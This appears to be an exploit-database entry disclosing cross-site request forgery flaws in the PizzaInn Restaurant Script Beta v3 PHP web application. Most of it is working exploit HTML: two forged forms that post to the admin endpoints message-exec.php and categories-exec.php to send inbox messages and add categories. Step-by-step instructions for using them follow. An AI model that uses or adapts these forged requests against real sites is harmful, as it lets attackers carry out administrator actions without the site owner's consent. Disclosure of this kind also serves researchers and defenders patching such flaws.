PizzaInn Beta 3 Cross Site Request Forgery Vulnerability

2016-10-20T00:00:00
ID 1337DAY-ID-25924
Type zdt
Reporter Nassim Asrir
Modified 2016-10-20T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title :----------------- : PizzaInn Restaurant Scripti (Beta v3) - (message-exec.php) - CSRF Send Inbox Message.
# Author :------------------------ : Nassim Asrir 
# Author Company :------------------------ : HenceForth
# Author Email :------------------------ : [email protected]
# Google Dork :---------------- :  -
# Date :-------------------------- : 20/10/2016
# Type :-------------------------- : webapps
# Platform : -------------------- :  PHP  
# Software link : -------------- : http://wmscripti.com/php-scriptler/pizzainn-restaurant-scripti-beta-v3.html
 
   
############################ CSRF Send Inbox Message Vulnerabilty ############################
       
## Exploit ##

<h1>Messages Management </h1>
</div>
<div id="container">
<form id="messageForm" name="messageForm" method="post" action="http://localhost/script/admin/message-exec.php" onsubmit="return messageValidate(this)">
  <table width="540" border="0" cellpadding="2" cellspacing="0" align="center">
  <CAPTION><h3>SEND A MESSAGE</h3></CAPTION>
    <tr>
      <th width="200">Subject</th>
      <td width="168"><input type="text" name="subject" id="subject" class="textfield" /></td>
    </tr>
    <tr>
      <th width="200">Message Box</th>
      <td width="168"><textarea name="txtmessage" class="textfield" rows="5" cols="60"></textarea></td>
    </tr>
    <tr>
      <td>&nbps;</td>
      <td align="center"><input type="submit" name="Submit" value="Send Message" />
    <input type="reset" name="Reset" value="Clear Field" /></td>
    </tr>
  </table>
</form>
<hr>
<table border="0" width="1000" align="center">
<CAPTION><h3>CSRF By Nassim Asrir</h3></CAPTION>

############################ CSRF Add Category Vulnerabilty ############################
       
## Exploit ##

<html>
<title>CSRF Exploit By Nassim Asrir</title>
<CAPTION><h3>ADD A NEW CATEGORY</h3></CAPTION>
<form name="categoryForm" id="categoryForm" action="http://Site/script/admin/categories-exec.php" method="post" onsubmit="return categoriesValidate(this)">
<tr>
    <th>Name</th>
    
</tr>
<tr>
    <td><input type="text" name="name" class="textfield" /></td>
    <td><input type="submit" name="Submit" value="Add" /></td>
</tr>
</form>
</table>
</html>

## Proc ##

- P.S: You must to register in the site to see the Inbox Message send by Admin.

- Create a .html File and Put the Code.

- Navigate the File in your Localhost .

- and Create Message in The Text Box  and you redirect to http://site/script/admin/access-denied.php

- and You get the Message "Access Denied! You do not have access to this resource." but don't worry. when you get the Message go to Your account . and you can see [Inbox] Navigate it and you see the Message .

#  0day.today [2018-01-05]  #